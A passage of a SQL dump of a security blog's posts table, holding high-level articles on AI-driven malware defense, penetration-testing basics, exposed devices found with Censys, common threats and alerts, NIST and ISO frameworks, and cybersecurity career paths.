suspicious activity.\n\n### 4. Leverage Threat Intelligence\n\nEquip teams with up-to-date threat intelligence and train ML models to identify emerging AI attack patterns, keeping defenses a step ahead of attackers.\n\n### 5. Train Employees to Identify Threats\n\nHuman errors remain a major vulnerability. Conduct regular training to help employees recognize phishing attempts, malicious URLs, and social engineering tricks deployed by AI.\n\n### 6. Regularly Patch Software\n\nKeeping systems updated is crucial. Attackers often exploit unpatched vulnerabilities to gain unauthorized access. Frequent software patching helps close these doors.\n\n### 7. Behavioral and Anomaly Analysis\n\nBehavior-based tools monitor abnormal patterns in network traffic, user activity, and endpoint devices. These analytics can detect threats that bypass traditional defenses.\n\n## Why Act Now?\n\nAI-driven cyberattacks are no longer a future possibility—they’re happening now, and organizations must act decisively to protect themselves. Whether you\'re leading a blue team or a cybersecurity organization, adapting to these threats with agile, AI-enhanced defensive strategies is no longer optional but essential.\n\nBy combining proactive defense mechanisms with human vigilance, you can lower exposure to risk and safeguard your systems more effectively.\n\n## Key Takeaways\n\n1. AI malware adapts and evolves, offering attackers an unprecedented advantage over traditional defenses.\n2. Proactive AI-powered tools are essential to detecting and responding to these threats.\n3. Strategies like Zero Trust Architecture, regular patching, and behavioral analysis fortify your defenses.\n4. Cybersecurity training is critical to protecting organizations from AI-powered phishing and social engineering.\n\nPrepare your organization for the next generation of cybersecurity threats. Arm your security teams with advanced tools and continuously refine your strategies to stay ahead of attackers.', '', 'http://infoseclabs.io/uploads/1768414450494-931549616.png', 'AI-generated malware concept illustrating cybersecurity threats', 1, 'published', '2025-02-23 11:25:00', '2026-01-14 21:14:25', 'Information Security', 'AI-Generated Malware: Cybersecurity Threats & Defense', 'Discover how AI-generated malware poses new cybersecurity threats and learn effective strategies to protect your systems.', 'AI malware'),
(33, 'Unlocking Cybersecurity: A Beginner\'s Guide to Penetration Testing', 'introduction-to-penetration-testing-tools-and-techniques', '# The Essential Guide to Penetration Testing\n\nCybersecurity is no longer optional—it\'s essential. With cyberattacks growing more sophisticated, penetration testing (or \"pen testing\") has become a critical strategy for both businesses and individuals to protect their sensitive data and systems. This beginner-friendly guide will walk you through the fundamentals of penetration testing, methodologies, tools, and practical steps to get started.\n\n## What is Penetration Testing?\n\nPenetration testing is a thorough, controlled, and ethical process of simulating a cyberattack on a computer system, network, or application. The goal is to identify security vulnerabilities before malicious hackers can exploit them. Think of it as hiring a \"friendly hacker\" to break into your systems to expose any weak spots, allowing you to fix them before a real attacker discovers them.\n\n### Why is Penetration Testing Important?\n\nPenetration testing provides several key benefits:\n\n- **Early Detection**: Unearth vulnerabilities and address them before cybercriminals do.\n- **Compliance**: Meet regulatory requirements (like PCI-DSS, HIPAA, or GDPR) that mandate regular security assessments.\n- **Risk Reduction**: Safeguard your data, reputation, and financial resources by reducing exposure to breaches.\n- **Proactive Defense**: Stay ahead of attackers by mimicking their tactics and learning how to counteract them effectively.\n\nFrom business owners to individual home computer users, penetration testing helps ensure peace of mind by proactively enhancing security measures.\n\n## Common Penetration Testing Methodologies\n\nThere isn’t a one-size-fits-all approach to penetration testing. Depending on the scope, access level, and goals, ethical hackers typically choose one of three main methodologies:\n\n### 1. Black-Box Testing\n\n- The tester has no prior knowledge of the system or its defenses.\n- Mimics an attack from an outsider who has to gather information from scratch.\n- **Best for** evaluating external threats.\n\n### 2. White-Box Testing\n\n- The tester is given full access to the system’s architecture, including source codes and network diagrams.\n- Ideal for finding deep, system-level vulnerabilities.\n- **Best for** internal audits and advanced analysis.\n\n### 3. Gray-Box Testing\n\n- The middle ground—testers have partial knowledge of the system, such as user credentials or architectural insights.\n- Simulates an attack by someone with limited insider knowledge (e.g., an employee with restricted access).\n- **Best for** balanced insights into both internal and external vulnerabilities.\n\n## The Essential Tools of Penetration Testing\n\nEffective penetration testing relies heavily on using the right tools. Here’s an overview of some of the most popular tools among ethical hackers:\n\n### 1. Metasploit\n\n- **Type of tool**: Framework\n- Ideal for testing vulnerabilities in networks, operating systems, and applications.\n- **Feature highlight**: Provides exploit modules to simulate a wide range of real-world attacks.\n\n### 2. Nmap (Network Mapper)\n\n- **Type of tool**: Scanning/Reconnaissance\n- **Purpose**: Maps out network structures and identifies potential weaknesses.\n- **Feature highlight**: Quick and efficient system and port scanning.\n\n### 3. Wireshark\n\n- **Type of tool**: Packet Analyzer\n- **Purpose**: Monitors network traffic to detect suspicious activity.\n- **Feature highlight**: Allows testers to examine data flow across networks in real-time.\n\n### 4. Burp Suite\n\n- **Type of tool**: Web Security Testing\n- **Purpose**: Detects and exploits vulnerabilities in web applications.\n- **Feature highlight**: Manages everything from mapping application vulnerabilities to finding loopholes in APIs.\n\nThese tools are just the tip of the iceberg, with countless options available for various needs, from wireless network testing to password cracking.\n\n## Getting Started with Penetration Testing\n\nBreaking into the world of penetration testing requires proper knowledge, ethical practice, and continuous learning. Here’s how you can get started:\n\n### 1. Build Your Foundation\n\nBegin by understanding networking, cybersecurity concepts, and system architectures. Familiarize yourself with protocols like HTTP, FTP, and TCP/IP.\n\n### 2. Learn Ethical Hacking\n\nEnroll in beginner-friendly training programs like **EC-Council’s CEH (Certified Ethical Hacker)** or **CompTIA Security+**. Online platforms like Cybrary, Hack The Box, and TryHackMe provide hands-on, gamified environments where you can practice your skills.\n\n### 3. Get Hands-On Experience\n\nStart exploring real-life scenarios in labs and controlled environments. Tools like Kali Linux, which includes pre-installed penetration testing tools, are a great way to practice.\n\n### 4. Stay Updated\n\nCybersecurity threats evolve rapidly. Regularly update your skills by attending webinars, reading the latest cybersecurity reports, and joining ethical hacking communities.\n\n## Real-World Examples of Penetration Testing Success\n\nPenetration testing has already saved countless businesses from devastating attacks. Here are some real-world examples:\n\n1. **Preventing a Financial Breach**  \n   A major banking institution discovered weaknesses in their online banking system through penetration testing. Vulnerabilities patched during testing prevented potential multi-million-dollar data leaks.\n\n2. **Strengthening E-Commerce Security**  \n   A popular online retail site identified loopholes in their payment processor\'s API. By fixing these vulnerabilities, they avoided both financial losses and reputational harm.\n\nThese success stories demonstrate just how effective penetration testing can be in safeguarding digital assets.', '', 'http://infoseclabs.io/uploads/1768414555190-777059998.jpg', NULL, 1, 'published', '2025-02-20 13:47:00', '2026-01-14 21:16:15', 'Information Security', 'Introduction to Penetration Testing: Tools and Techniques', NULL, NULL),
(34, 'Exploring Censys: Discovering Unsecured Devices on the Public Internet', 'finding-weird-devices-on-the-public-internet', '# Exploring Unexpected Devices on the Public Internet\n\nHave you ever wondered how many peculiar or unexpected devices are accessible on the public internet? From unsecured cameras to exposed billboards, a surprising number of devices are left open for anyone to find—raising serious questions about cybersecurity and privacy. This guide dives deep into the oddities lurking across the web, how they’re discovered, and why cybersecurity enthusiasts should pay attention.\n\n## The Search Begins with Censys\n\n### What is Censys?\n\nCensys is an advanced internet intelligence platform often described as \"Google for the entire internet.\" It allows users to scan the open web for connected devices, services, and ports. Think of it as a cybersecurity tool enabling users to gain insights into devices or services that may be inadvertently exposed online.\n\nUsing Censys, you can search for information such as:\n\n- IP addresses\n- Protocols and ports\n- Device types\n- Metadata of services and software\n\nThe platform is widely used for threat hunting, research, and attack surface management.\n\n## How Weird Devices Get Exposed Online\n\nThe open internet is home to numerous devices that shouldn\'t be publicly accessible. These range from security cameras to industrial control systems. For example:\n\n- **Unsecured Cameras**: Devices like IP cameras can be accessed without authentication due to poor configuration.\n- **Industrial Control Systems (ICS)**: Systems controlling factories or critical infrastructure occasionally show up, exposing sensitive operational data.\n- **Publicly Accessible Billboards**: Devices like electronic billboards with remote login vulnerabilities allow you to access their settings.\n\nThe reasons devices get exposed vary, including misconfigured networks, outdated software, or default credentials being left unchanged.\n\n## Real-life Examples of Exposed Devices\n\nUsing creative search queries in Censys, cybersecurity professionals (and cyber attackers alike) can uncover an array of fascinating and sometimes alarming devices:\n\n- **Billboards**: Researchers have found electronic billboards whose setups allow unauthorized users to change their displayed content.\n- **Traffic Cameras**: Instances of public traffic or surveillance cameras left accessible without passwords have been reported, leading to potential privacy breaches.\n- **Building Automation Systems**: Devices managing HVAC systems, lights, or elevators are occasionally accessible, potentially disrupting operations.\n\nEach discovery highlights the importance of securing devices and minimizing exposure.\n\n## How Censys Users Discover These Devices\n\nTo uncover these devices, users rely on pre-built queries or create their own using Censys’ filters. A valuable resource for inspiration is the \"Awesome Censys Queries\" repository on GitHub, which includes examples for tracking:\n\n- Modbus Protocols (Industrial devices)\n- IP Cameras\n- Remote Access Services like RDP or VNC\n- Password-protected sites with weak credentials\n\nThese queries allow users to filter results by protocols, geolocation, device types, and even metadata associated with devices or services.\n\n## The Ethical Dilemma\n\nAccessing publicly exposed devices brings ethical challenges. While tools like Censys are designed for legitimate cybersecurity purposes, it is important to ensure any exploration adheres to ethical guidelines. Accessing or tampering with these devices without the owner’s permission can lead to legal repercussions.\n\nFor ethical cybersecurity enthusiasts:\n\n1. Use tools such as Censys for research and educational purposes only.\n2. Report vulnerabilities to the device owners or responsible parties when identified.\n3. Avoid altering or accessing sensitive data to minimize harm.\n\n## Why Cybersecurity Professionals Should Care\n\nUnderstanding the types of devices exposed online is critical for several reasons:\n\n1. **Threat Awareness**: Knowing what’s out there raises awareness of risks posed by unsecured devices.\n2. **Reducing Attack Surfaces**: IT professionals use tools like Censys to monitor and secure their organization’s devices.\n3. **Strengthening Best Practices**: Identifying vulnerabilities showcases the importance of applying cybersecurity best practices, such as disabling unused ports and using strong, unique credentials.\n\n## Top Tips for Securing Devices\n\nTo minimize device exposure and safeguard sensitive data:\n\n- **Update Regularly**: Ensure all devices run the latest software to mitigate known vulnerabilities.\n- **Change Default Credentials**: Replace default usernames and passwords with strong, unique combinations.\n- **Restrict Access**: Limit which networks can access devices using firewalls or VPNs.\n- **Monitor Open Ports**: Use tools like Censys to periodically check what devices or services are publicly accessible.\n\nThe public internet is full of fascinating but sometimes alarming surprises. With tools like Censys, cybersecurity enthusiasts have the opportunity to explore, research, and contribute to a safer digital world. However, with great power comes great responsibility—always adhere to ethical practices when using such tools.', '', 'http://infoseclabs.io/uploads/1768621975620-268813292.png', 'Unsecured internet devices like cameras and billboards exposed online', 1, 'published', '2026-01-16 16:34:00', '2026-01-17 06:52:58', 'Information Security', 'Discovering WEIRD Devices Online', 'Explore the surprising world of unsecured devices on the internet and learn why cybersecurity is crucial.', 'WEIRD Devices'),
(35, '10 Common Cyber Threats and How to Mitigate Them', '10-common-cyber-threats-and-how-to-mitigate-them', '# 10 Common Cyber Threats and How to Mitigate Them\n\n**Published: January 25, 2026 | InfoSecLabs**\n\nCyber threats are continuously evolving, posing serious risks to businesses, governments, and individual users. The consequences can range from financial loss and stolen data to disrupted operations. To stay ahead, it is crucial to understand the most common cyber threats and how to effectively mitigate them. Whether you\'re an IT security expert or a homeowner managing a smart device, this guide is for you.\n\n## 1. Phishing\n\n### What It Is\nPhishing attacks involve tricking users into revealing sensitive information, such as usernames, passwords, or financial details, through deceptive emails or messages.\n\n### Real-World Example\nThe infamous attack on a major social media company in 2020 originated from a phishing scam. Employees were deceived into providing access credentials, leading to compromised accounts of high-profile users.\n\n### How to Mitigate It\n- **Employee Training:** Educate employees about recognizing suspicious emails and links.\n- **Email Filters:** Implement spam and phishing filters to flag suspicious emails.\n- **Multi-Factor Authentication (MFA):** Even if credentials are stolen, MFA adds an extra layer of protection.\n\n## 2. Ransomware\n\n### What It Is\nRansomware encrypts a victim’s files and demands payment for the decryption key, locking users out of critical data.\n\n### Real-World Example\nThe 2017 WannaCry attack affected over 300,000 computers globally, crippling healthcare services, governments, and corporations.\n\n### How to Mitigate It\n- **Regular Backups:** Ensure all critical data is backed up and stored offline.\n- **Software Updates:** Keep operating systems and software up-to-date to patch vulnerabilities.\n- **Endpoint Security:** Deploy robust anti-ransomware tools.\n\n## 3. Distributed Denial of Service (DDoS) Attacks\n\n### What It Is\nA DDoS attack floods your network or server with traffic, making it unavailable to legitimate users.\n\n### Real-World Example\nA major DNS provider was hit with a DDoS attack in 2016, temporarily taking down websites like Netflix, Twitter, and PayPal.\n\n### How to Mitigate It\n- **Traffic Monitoring:** Use tools to identify and filter unusual traffic patterns.\n- **Content Delivery Networks (CDNs):** CDNs help distribute and manage traffic more effectively.\n- **Firewall Rules:** Implement application firewalls to block malicious requests.\n\n## 4. Malware\n\n### What It Is\nMalware encompasses a variety of harmful software, including viruses, worms, and trojans, that infiltrate systems to disrupt operations or steal data.\n\n### Real-World Example\nThe infamous Stuxnet worm targeted industrial systems, reportedly damaging a nuclear facility’s infrastructure.\n\n### How to Mitigate It\n- **Antivirus Software:** Ensure antivirus tools are installed and regularly updated.\n- **Safe Browsing:** Avoid downloading files or software from unknown sources.\n- **Least Privilege:** Limit user access to critical systems and data.\n\n## 5. Social Engineering\n\n### What It Is\nSocial engineering manipulates individuals into divulging confidential information through psychological tricks, often bypassing technical defenses entirely.\n\n### Real-World Example\nCybercriminals posed as IT support and convinced employees of a large corporation to share login details, leading to a major data breach.\n\n### How to Mitigate It\n- **Awareness Campaigns:** Train employees on common social engineering tactics like pretexting.\n- **Verification Protocols:** Always verify the identity of individuals requesting sensitive information.\n- **Simulated Attacks:** Conduct periodic tests to educate and prepare your team.\n\n## 6. Insider Threats\n\n### What It Is\nAn insider threat arises when an employee, contractor, or third party intentionally or unintentionally compromises security from within.\n\n### Real-World Example\nA disgruntled employee leaked critical company data to competitors as revenge for being laid off.\n\n### How to Mitigate It\n- **User Monitoring:** Monitor for unusual user activity or data access patterns.\n- **Access Controls:** Restrict access to sensitive data based on role and necessity (RBAC).\n- **Exit Protocols:** Revoke access rights immediately when an employee leaves the organization.\n\n## 7. Zero-Day Exploits\n\n### What It Is\nZero-day exploits target vulnerabilities in software that are unknown to the vendor, leaving no time for a patch before the attack occurs.\n\n### Real-World Example\nThe 2021 Microsoft Exchange Server hack targeted previously unknown vulnerabilities, compromising thousands of servers globally.\n\n### How to Mitigate It\n- **Defense in Depth:** Use multiple layers of security so one failure isn\'t catastrophic.\n- **Threat Intelligence:** Utilize AI tools to monitor for emerging threats.\n- **Network Segmentation:** Limit the impact of intrusions by isolating systems.\n\n## 8. SQL Injection (SQLi)\n\n### What It Is\nAttackers inject malicious SQL code into a web application\'s database queries, allowing them to view, modify, or delete database data.\n\n### Real-World Example\nMany high-profile data breaches involving millions of user records have stemmed from unpatched SQL injection vulnerabilities in web forms.\n\n### How to Mitigate It\n- **Prepared Statements:** Use parameterized queries to ensure inputs are treated as data, not code.\n- **Input Validation:** Sanitize and validate all user inputs on the server side.\n- **Regular Testing:** Perform SQLi vulnerability scans on all web applications.\n\n## 9. Man-in-the-Middle (MitM) Attacks\n\n### What It Is\nAn attacker intercepts communication between two parties (e.g., a user and their bank) to eavesdrop or alter the data being exchanged.\n\n### Real-World Example\nAttackers setting up rogue Wi-Fi hotspots in coffee shops to intercept login credentials from unsuspecting users.\n\n### How to Mitigate It\n- **Encryption:** Enforce HTTPS and TLS for all data in transit.\n- **VPN Use:** Encourage the use of Virtual Private Networks (VPNs) on public Wi-Fi.\n- **Endpoint Security:** Detect and block unauthorized interception tools.\n\n## 10. Credential Stuffing\n\n### What It Is\nAttackers use automated bots to test millions of username/password pairs stolen from other breaches against various websites, betting on users reusing passwords.\n\n### Real-World Example\nIn 2020, hundreds of thousands of user accounts on a popular video game platform were compromised due to reused passwords from other leaks.\n\n### How to Mitigate It\n- **Password Policies:** Enforce strong, unique passwords and ban common ones.\n- **Rate Limiting:** Block IP addresses that make too many failed login attempts.\n- **MFA:** Require a second form of verification to stop attackers even if they have the password.\n\n\nCybersecurity is a shared responsibility. By understanding these 10 common threats and implementing strong mitigation strategies, organizations and individuals can significantly reduce their risk profile. Stay vigilant, keep learning, and prioritize security in every digital interaction.', '', 'http://infoseclabs.io/uploads/1769226516310-299248879.jpg', 'Illustration of cybersecurity defense against cyber threats', 1, 'published', '2026-01-22 21:43:00', '2026-01-25 22:03:00', 'Information Security', 'Top 10 Cyber Threats & Mitigation Strategies', 'Discover common cyber threats and learn effective ways to mitigate them. Stay secure with our expert guide.', 'Cyber Threats'),
(36, 'Top Cybersecurity Alerts Every Organization Must Know and How to Handle Them', 'most-common-cybersecurity-alerts-in-organizations', '# Understanding Cybersecurity Alerts\n\nCyber threats are on the rise, and organizations face a constant battle to secure their systems. One of the first lines of defense? Cybersecurity alerts. These alerts serve as invaluable early warnings, highlighting vulnerabilities or potential breaches within a network.\n\nIf you\'re aiming to enhance your organization\'s cybersecurity defenses, understanding the most frequently seen alerts is crucial. Here\'s an in-depth look at the most common cybersecurity alerts encountered by organizations and how to tackle them effectively.\n\n## What Are Cybersecurity Alerts?\n\nCybersecurity alerts notify you of potential threats or vulnerabilities in your organization\'s network, applications, or systems. They originate from tools like intrusion detection systems (IDS), firewalls, endpoint protection solutions, and Security Information and Event Management (SIEM) platforms. These alerts help organizations identify risks early and respond swiftly, reducing potential damage.\n\nLet\'s explore the most common types of these alerts and what steps organizations can take to address them.\n\n### 1. Phishing Attempts\n\nPhishing is one of the most widespread cyber threats, targeting organizations across industries. These alerts indicate suspicious emails containing malicious links or attachments designed to steal sensitive information like login credentials or financial data.\n\n#### How to Respond:\n\n- Immediately identify and quarantine phishing attempts.\n- Educate employees on spotting phishing emails to prevent incidents.\n- Implement email security filters and multi-factor authentication (MFA).\n\n#### Why This Matters:\n\nPhishing attacks are growing more sophisticated, and even a single successful attempt can result in data breaches or financial losses.\n\n### 2. Malware Detection\n\nCybersecurity systems often flag malware activities, such as viruses, spyware, worms, trojans, or ransomware. Malware can quickly spread across networks, infecting systems and jeopardizing sensitive data.\n\n#### How to Respond:\n\n- Isolate infected devices to contain the spread.\n- Conduct a thorough scan to identify compromised data or systems.\n- Initiate remediation through antivirus tools and advanced threat detection platforms.\n\n#### Why This Matters:\n\nMalware attacks often cascade into other issues like data theft or operational downtime, making swift responses critical.\n\n### 3. Unauthorized Access Attempts\n\nUnauthorized access alerts occur when individuals attempt to gain entry into restricted areas of your network. This can stem from external attacks, such as brute force attempts, or internal risks like compromised credentials.\n\n#### How to Respond:\n\n- Confirm the legitimacy of access attempts.\n- Revoke access for compromised credentials and reset passwords.\n- Strengthen access controls with MFA and IP whitelisting.\n\n#### Why This Matters:\n\nUnauthorized access increases risks of data exfiltration, operational disruptions, or insider threats.\n\n### 4. Data Exfiltration Alerts\n\nThese alerts signal that sensitive data might be leaving your organization without authorization. Often, they indicate unauthorized cloud storage uploads, large file transfers, or unusual outbound traffic.\n\n#### How to Respond:\n\n- Halt the unauthorized transfer immediately.\n- Investigate the source of data exfiltration and pinpoint affected data.\n- Enforce stricter Data Loss Prevention (DLP) policies.\n\n#### Why This Matters:\n\nData exfiltration not only risks compliance violations (think GDPR or HIPAA fines) but also damages an organization\'s reputation with clients and stakeholders.\n\n### 5. Denial-of-Service (DoS) Attacks\n\nDenial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks overwhelm organizational systems with excessive traffic, rendering critical services unavailable. These alerts detect instances of abnormal traffic spikes.\n\n#### How to Respond:\n\n- Configure rate-limiting rules to regulate traffic spikes.\n- Leverage Content Delivery Networks (CDNs) to absorb attacks.\n- Work closely with Internet Service Providers (ISPs) for mitigation measures.\n\n#### Why This Matters:\n\nDoS attacks can paralyze systems and jeopardize your organization\'s ability to serve customers effectively.\n\n### 6. Vulnerability Exploits\n\nVulnerability exploit alerts indicate attempts to exploit known weaknesses in your system. These could target zero-day flaws, outdated software, or misconfigurations left unpatched.\n\n#### How to Respond:\n\n- Immediately apply security patches for known vulnerabilities.\n- Conduct regular vulnerability scans to identify weak points.\n- Prioritize monitoring and addressing critical assets.\n\n#### Why This Matters:\n\nAttackers often exploit known vulnerabilities within hours of their discovery—proactive defenses are non-negotiable.\n\n### 7. Insider Threats\n\nCybersecurity alerts don\'t always point to external threats. Sometimes, the risk comes from employees or contractors who misuse access, either intentionally or accidentally. Behavioral analytics flags unusual activities, such as accessing files at odd hours or downloading large volumes of data.\n\n#### How to Respond:\n\n- Begin a thorough investigation to determine intent.\n- Address negligence with training or correct malicious behavior with corrective action.\n- Update access policies to reflect stricter protocols.\n\n#### Why This Matters:\n\nInsider threats bypass external defenses, making them particularly dangerous and harder to detect.\n\n### 8. Configuration Change Alerts\n\nUnexpected system configuration changes (e.g., adjustments to security policies or access privileges) often indicate an attempt to weaken defenses. These changes are flagged to keep your systems secure.', '', 'http://infoseclabs.io/uploads/1769364323926-514133078.png', 'Illustration of cybersecurity alert notifications on a digital interface', 1, 'published', '2026-01-25 13:01:00', '2026-01-25 21:05:32', 'Information Security', 'Top Cybersecurity Alerts & Solutions', 'Learn about crucial cybersecurity alerts and how to handle them effectively to protect your organization.', 'Cybersecurity alerts'),
(37, 'Understanding Cybersecurity Frameworks: NIST, ISO, and More', 'understanding-cybersecurity-frameworks-nist-iso-and-more', '# Cybersecurity Frameworks: Enhancing Security in the Digital Age\n\nCybersecurity remains a top priority for businesses and individuals in our increasingly digital world. Understanding how to secure sensitive information and combat cyber threats can be daunting. This is where cybersecurity frameworks come into play—they serve as structured guidelines to improve security measures and minimize risks. For IT professionals, business owners, and cybersecurity enthusiasts alike, understanding these frameworks is essential for building a strong defense.\n\nThis article will guide you through some of the most popular cybersecurity frameworks, including NIST and ISO, and how they can benefit your organization.\n\n## What Are Cybersecurity Frameworks?\n\nCybersecurity frameworks are structured guidelines and best practices designed to help organizations identify, manage, and mitigate security risks. They offer a comprehensive approach to building a robust cybersecurity strategy, addressing everything from risk assessments to incident response.\n\nFrameworks provide a common language for teams to discuss security, ensuring consistency and alignment across the organization. They are essential for:\n\n- Protecting sensitive information from cyber threats.\n- Meeting compliance requirements for industry regulations.\n- Giving stakeholders confidence in the organization\'s security measures.\n\n## The NIST Cybersecurity Framework\n\nThe **NIST Cybersecurity Framework (CSF)**, developed by the National Institute of Standards and Technology, has become a gold standard for organizations worldwide. Initially intended to secure critical infrastructure, NIST is now widely adopted by businesses across industries for its flexibility and robust structure.\n\n### Key Functions of the NIST Framework\n\nThe NIST CSF is based on five core functions that define the lifecycle of a cybersecurity program:\n\n1. **Identify** – Understand your systems, assets, and risks.\n2. **Protect** – Implement safeguards to ensure services and data are secure.\n3. **Detect** – Monitor for anomalies and potential breaches.\n4. **Respond** – Have a plan to contain and mitigate threats.\n5. **Recover** – Restore operations and data after a security incident.\n\nEach function includes specific categories and subcategories to address various aspects of cybersecurity, making it adaptable and accessible to organizations large and small.\n\n### Why Choose NIST?\n\n- **Flexibility:** The framework is scalable and can be tailored to any industry or business size.\n- **Alignment:** Incorporates global standards, making it easier to align with other frameworks or regulations.\n- **Accessibility:** Free and widely available, making it an excellent option for businesses starting their cybersecurity planning.\n\n## ISO/IEC 27001\n\nThe **ISO/IEC 27001** is an internationally recognized standard for information security management systems (ISMS). It provides organizations with a systematic approach to managing sensitive information and ensures they meet high standards of security.\n\n### Core Elements of ISO/IEC 27001\n\n- Development of an Information Security Management System (ISMS) tailored to the organization\'s needs.\n- Risk assessments and ongoing evaluation of threats.\n- Implementing a framework of policies, controls, and procedures to mitigate risks.\n\nISO/IEC 27001 certification demonstrates to stakeholders, clients, and regulators that your organization is committed to maintaining robust cybersecurity standards.\n\n### Benefits of ISO/IEC 27001\n\n- **Global Credibility:** Being ISO-certified boosts credibility and trust among partners and customers.\n- **Compliance:** Helps meet regulatory and contractual requirements.\n- **Holistic Approach:** Focuses on both technology and processes for information security.\n\n## NIST vs. ISO/IEC 27001\n\nWhile both frameworks aim to enhance cybersecurity, they differ in scope and structure. Here\'s a quick comparison:\n\n| Aspect        | NIST CSF                                        | ISO/IEC 27001                              |\n|---------------|-------------------------------------------------|--------------------------------------------|\n| Focus         | Cybersecurity for critical operations           | Holistic information security management   |\n| Adoption      | Widely used in the U.S. and adaptable globally  | Recognized worldwide                       |\n| Certification | No formal certification                         | Certification available                    |\n| Flexibility   | Highly adaptable for various organizations      | Focused on systematic ISMS approach        |\n| Cost          | Free to use                                     | Relatively higher cost of implementation   |\n\n### Combining NIST and ISO\n\nMany organizations choose to combine elements of NIST and ISO. For instance, they may follow NIST\'s guidelines for cybersecurity while adopting ISO\'s structure for documenting and managing risks.\n\n## Other Notable Frameworks\n\nBeyond NIST and ISO, several other frameworks cater to specific cybersecurity needs:\n\n- **CIS Controls:** Offers a prioritized set of actions to defend against common cyber threats.\n- **COBIT:** Focuses on governance and management of enterprise IT.\n- **HIPAA Security Rule:** Ensures the privacy and security of health information in the healthcare sector.\n\nThese frameworks often work well alongside NIST or ISO, helping organizations tailor their approach based on industry-specific needs.\n\n## How to Apply Cybersecurity Frameworks in Practice\n\nHere are a few examples of how organizations can implement these frameworks effectively:', '', 'http://infoseclabs.io/uploads/1769824241468-134111856.jpg', 'Illustration of cybersecurity frameworks like NIST and ISO', 1, 'published', '2026-01-30 13:39:00', '2026-01-31 04:50:46', 'Information Security', 'Guide to Cybersecurity Frameworks: NIST & ISO', 'Explore NIST and ISO frameworks to enhance your cybersecurity strategy and protect sensitive data effectively.', 'Cybersecurity Frameworks');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(38, 'The Truth About Starting a Career in Cybersecurity with Bootcamp', 'the-truth-about-starting-a-career-in-cybersecurity-with-bootcamp', '# Breaking into Cybersecurity: A Comprehensive Guide\n\nThe field of cybersecurity has gained immense popularity in recent years, and with good reason. From protecting sensitive information to safeguarding systems against attacks, cybersecurity professionals play a vital role in the modern digital ecosystem. With increased demand, however, comes an abundance of training programs promising to fast-track individuals to six-figure salaries in just a few weeks. Unfortunately, many of these claims are misleading.\n\nIf you’re thinking about pursuing a career in cybersecurity, this detailed guide will help you understand the realities of entering the field, the importance of mastering foundational skills before diving into advanced certifications, and how to structure your learning to set yourself up for success.\n\n## Understanding the Hype Around Cybersecurity Training Programs\n\nYou\'ve likely seen advertisements about cybersecurity bootcamps or courses claiming you’ll earn $100,000 after completing a short training program. While it’s easy to fall for such promises, the reality is far different. According to industry experts, this oversimplified approach neglects the depth of knowledge and hands-on experience required to succeed in a cybersecurity role.\n\n### Why the Hype Can Be Misleading\n\n1. **Lack of Basics**: Many training providers focus exclusively on advanced certifications like Security+ while skipping essential foundational knowledge like networking and system administration.\n2. **False Promises**: Claims of instant high-paying jobs are often exaggerated. Employers hire for skills, experience, and confidence, none of which are gained overnight.\n3. **Profit-Driven Approach**: Some programs are designed by businesses more focused on boosting their revenue than truly equipping students with the necessary skills.\n\n## Mastering the Foundations Before Cybersecurity\n\nOne of the most important lessons for aspiring cybersecurity professionals is simple: _you can’t secure what you don’t understand_. Before jumping into cybersecurity, you need a solid understanding of how IT systems work. Here’s how to get started:\n\n### 1. Start With IT Fundamentals\n\nIf you’re completely new to tech, begin with a course like **CompTIA IT Fundamentals (ITF+)** to familiarize yourself with basic IT concepts. Learn about hardware, software, and how operating systems function.\n\n### 2. Focus on System Administration\n\nUnderstand how core components like RAM, CPUs, and hard drives interact. Learn the basics of maintaining systems, securing data, and managing configurations. Certifications like **CompTIA A+** can help solidify these concepts.\n\n### 3. Learn Networking Essentials\n\nNetworking is at the heart of cybersecurity, so it’s crucial to learn about how devices communicate. Start with **CompTIA Network+** or a vendor-specific certification like **Cisco\'s CCNA** to grasp key concepts like IP addressing, routing, subnets, and networking protocols.\n\n### Why These Steps Matter\n\nYou can’t secure a device, network, or system unless you understand how it operates. Jumping straight to advanced cybersecurity concepts without these fundamentals will leave you ill-prepared for real-world challenges.\n\n## Building a Strong Pathway to Cybersecurity\n\nOnce you’ve established a solid IT foundation, you’re ready to begin exploring cybersecurity. Follow a progressive learning path to build your expertise step by step.\n\n### 1. Start With Security Basics\n\n- **Recommended Certification**: **CompTIA Security+**\n- Learn about network security, access controls, and threat management.\n- Focus on understanding security principles rather than simply memorizing facts.\n\n### 2. Explore Specialized Roles\n\nCybersecurity is a vast field, so it’s essential to identify your area of interest:\n\n- **Penetration Testing**: Learn ethical hacking techniques through certifications like **CEH (Certified Ethical Hacker)** or **OSCP (Offensive Security Certified Professional)**.\n- **Security Analyst**: Progress to certifications like **CySA+** or advanced credentials like **CISSP (Certified Information Systems Security Professional)**.\n\n### 3. Gain Hands-On Experience\n\nCybersecurity isn’t just theoretical. Employers value hands-on experience, so look for opportunities to practice in real-world or simulated environments:\n\n- **Labs and Simulations**: Platforms like TryHackMe, Hack The Box, or virtual labs built within certification courses.\n- **Internships and Entry-Level Jobs**: Start as an IT support technician or systems administrator to gain experience while building your cybersecurity knowledge.\n\n### 4. Continue Learning and Adapting\n\nTechnology evolves rapidly, and so do cybersecurity threats. Commit to lifelong learning through continuing education, industry webinars, or by staying current with new certifications.\n\n## The Importance of Time and Patience\n\nBuilding a career in cybersecurity doesn’t happen in a matter of weeks. It’s a profession that requires dedication and continuous learning. Here are a few key takeaways to keep in mind:\n\n- **Time Commitment**: It may take 1–2 years of consistent learning and hands-on practice to feel ready for intermediate cybersecurity roles.\n- **Avoid Shortcuts**: Avoid programs or bootcamps promising quick results without explaining the depth of knowledge required.\n- **Ask Yourself the Hard Questions**:\n  - Would you hire yourself to secure a multi-million-dollar network after just a few weeks of training?\n  - Do you feel confident in your ability to identify, analyze, and address advanced threats?\n\nPatience and consistency are key. The professionals making six figures today spent years building their expertise, starting from the fundamentals and steadily progressing.\n\n## Beware of Low-Quality Training Programs\n\nUnfortunately, there are many low-quality cybersecurity programs designed purely to profit from the industry\'s demand for skilled professionals. Here’s how to spot red flags:\n\n- **Programs That Skip Basics**: If a program starts at advanced certifications like Security+ without covering IT and networking basics, it’s a warning sign.\n- **Get-Rich-Quick Claims**: Promises of earning six figures right away are unrealistic.\n- **Lack of Practical Training**: Theoretical knowledge alone isn\'t enough. Verify that the program offers labs or hands-on projects.\n\n## Cybersecurity 